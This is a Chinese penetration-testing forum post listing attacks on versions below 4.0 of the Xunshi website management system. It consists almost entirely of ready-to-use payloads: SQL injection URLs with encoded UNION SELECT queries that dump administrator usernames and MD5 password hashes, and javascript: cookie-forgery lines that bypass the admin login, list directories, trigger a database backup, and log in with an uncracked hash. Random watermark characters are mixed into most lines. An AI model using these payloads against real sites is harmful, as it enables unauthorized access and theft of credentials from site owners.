中国网络渗透测试联盟

标题: 讯时网站管理系统4.0以下漏洞 [打印本页]

作者: admin    时间: 2016-5-11 14:55
标题: 讯时网站管理系统4.0以下漏洞
一、注入- x7 d& y8 n( E; L. e- t
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
+ \+ S& }0 J  m4 h
- ~4 `1 l8 @) F& C2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp" 2 a8 g% O( f; Z9 X0 Z
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
3 x3 _3 ?, |/ @5 T/ ?可得到用户名和MD5加密码的密码。
1 D* C1 |1 e7 t0 `5 n; B: |
5 A# ?# m) u. N! v二、cookies欺骗
$ r4 h. e8 x$ s4 K* H8 |! Z, ^* h, e4 L* Y: _' M
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. + L5 U/ y; I- \! `4 W5 }# x
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
8 `- p' \3 q: ]9 \/ ~- k- g
( X" M& t8 F, z2、列目录.   c1 c: h; f/ s- w' _
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."9 z. m* f1 a( O! C: s  O

7 E0 q2 J' q' K, G# i  ^! u3、数据库备份(适用性好像比较低.) 3 Q( L+ F; @) t1 E2 r) n
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
1 Q1 z2 z+ \4 w: d: n+ N3 W* d1 x9 O, S2 ?. [
4、得到MD5密码解不了密进后台方法
$ k3 K& Y$ J) k! ]9 P( ^javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"4 h4 ^9 }8 r1 A3 }( r7 E





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2